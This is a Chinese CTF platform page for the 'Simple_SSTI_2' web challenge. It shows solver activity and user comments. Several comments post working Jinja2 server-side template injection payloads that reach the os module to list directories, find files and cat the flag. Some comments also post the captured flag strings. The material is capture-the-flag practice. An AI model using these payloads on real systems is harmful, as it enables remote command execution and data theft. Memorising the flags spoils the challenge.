Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16200
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
easier 攻破了该题 9小时前
xshzgjshpy 攻破了该题 2天前
aboic 攻破了该题 3天前
xiaomiao123 攻破了该题 3天前
yiwuxiaobawang 攻破了该题 4天前
chengluo 攻破了该题 5天前
Fbug 攻破了该题 5天前
minz 攻破了该题 5天前
0854永不言败 攻破了该题 7天前
bhcxzhdsa 攻破了该题 7天前
wwwwjjj 攻破了该题 8天前
gongyy 攻破了该题 8天前
白菜白又白 攻破了该题 8天前
igrazee 攻破了该题 8天前
yangwen 攻破了该题 9天前
ixin 攻破了该题 9天前
66666ctfxr 攻破了该题 10天前
Zhengzanmei 攻破了该题 10天前
liang123456 攻破了该题 10天前
评论
2280443298 1年前
举报
{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
zhenbuhuiweb 1年前
举报
flag{d15e0ca95ddb50b992109b24c82cfe5a}
ssln 1年前
举报
114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令
210470qq 1年前
举报
flag{43b52fa732d6f8ccbfacea9e989ac07b}
songci 1年前
举报
ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""
Mirabelle 1年前
举报
?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
ZeronKR1212 2年前
举报
怎么做啊,哥哥们
kimizu 2年前
举报
SSTI模板注入,先尝试搜索有没有flag文件,发现有,cat以下就行 {{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
3347665154 2年前
举报
flag{a0a8ab35c083003f4bb44c7920b69bd1}
jinyuxin 2年前
举报
flag{3da091678f181776084413b87192ea57}